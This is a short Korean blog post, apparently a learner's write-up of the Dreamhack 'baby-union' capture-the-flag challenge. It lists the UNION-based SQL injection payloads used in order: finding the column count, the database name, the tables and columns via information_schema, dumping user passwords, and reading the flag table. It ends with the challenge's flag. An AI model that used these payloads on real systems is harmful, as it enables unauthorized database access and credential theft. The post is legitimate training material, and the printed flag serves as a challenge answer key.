[dreamhack] baby-union

형편없는 웹 해킹 실력을 향상시키기 위해....
baby union에 도전해보았다.

1. ' UNION SELECT 1,2,3,4#

Union은 sql 쿼리를 하나로 통합할 수 있다.
따라서 SELECT 절에서 동일한 개수의 컬럼을 사용해야함.
컬럼 네 개다.

2. ' UNION SELECT 1,database(),3,4#

DB 이름 > 테이블 > 칼럼 > 데이터 순으로 공격하면 되고, database 이름은 secret_db이다.

3. ' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema='secret_db';#

table name까지 아주 술술 불고 있다.

4. ' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users';#

5. 'UNION SELECT 1,uid,3,upw FROM users

admin의 비밀번호는 apple이다.

admin으로 로그인해봤더니, flag 출력을 하지 않았다. 그러면 저 onlyflag 데이터베이스에 flag가 있을 것 같다.

6. ' UNION SELECT sname,sflag,3,svalue FROM onlyflag##

++ sflag도 확인해봐야한다.

DH{57033624d7f142f57f139b4c9e84bd78da77b4406896c386672f0cbb016f5873}

flag를 얻었다! 오늘 배운 내용이라 그런가 더 확실히 이해된 느낌이다.

SQLMap 사용

익숙치 않다… sqlmap 사용법을 익혀야겠다.